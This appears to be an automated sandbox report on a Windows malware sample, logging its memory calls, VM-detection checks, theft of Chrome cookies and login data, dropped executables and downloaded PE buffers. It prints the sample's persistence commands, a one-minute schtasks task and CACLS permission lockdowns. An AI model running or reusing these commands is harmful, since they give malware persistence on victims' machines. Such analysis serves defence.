NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02070000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e9b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02580000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00802000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0081c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dca000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02331000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02333000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eeee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ed6b000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0080a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02334000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec9f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0080c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ebb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0081a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ebc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0081d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (22 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2425287 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2425287 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2425077 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2425077 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2424922 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2424922 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2424813 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:28 a.m.	number_of_free_clusters: 2424813 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423872 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423872 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423713 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423713 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423608 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423608 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423201 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423201 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423006 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2423006 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2422866 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2422866 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2422773 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 13, 2023, 8:29 a.m.	number_of_free_clusters: 2422773 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (26 events)

file	C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x6558453.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h8741057.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\b9632235.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y9697386.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\d4904288.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\y8949096.exe
file	C:\Users\test22\AppData\Local\Temp\IXP007.TMP\k5556685.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\e7254436.exe
file	C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v6329954.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\i2742322.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x9212526.exe
file	C:\Users\test22\AppData\Local\Temp\IXP007.TMP\j5374024.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\v2696155.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\m8121508.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\l0309674.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\c4167888.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v2133053.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\g0104781.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\n4711704.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\a9421387.exe
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\y5450570.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\f6979804.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "lamod.exe" /P "test22:N"&&CACLS "lamod.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe
file	C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe
file	C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe

Drops an executable to the user AppData folder (10 events)

file	C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\y5450570.exe
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\l0309674.exe
file	C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y9697386.exe
file	C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\y8949096.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\m8121508.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\n4711704.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 13, 2023, 8:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe	1	1
ShellExecuteExW June 13, 2023, 8:29 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW June 13, 2023, 8:29 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "lamod.exe" /P "test22:N"&&CACLS "lamod.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW June 13, 2023, 8:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe	1	1
ShellExecuteExW June 13, 2023, 8:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe	1	1
ShellExecuteExW June 13, 2023, 8:30 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process lamod.exe (3 events)

Time & API	Arguments	Status	Return
InternetReadFile June 13, 2023, 8:29 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d`j@ P â @Á ¢´À r@ T@ .textcd `.dataHh@À.idataR j@@.rsrcÀt\|@@.reloc@ ð@B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile June 13, 2023, 8:29 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà dÐ `j@ @Á ¢´Àè± T@ .textcd `.dataHh@À.idataR j@@.rsrcÀ À² \|@@.reloc .@B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M 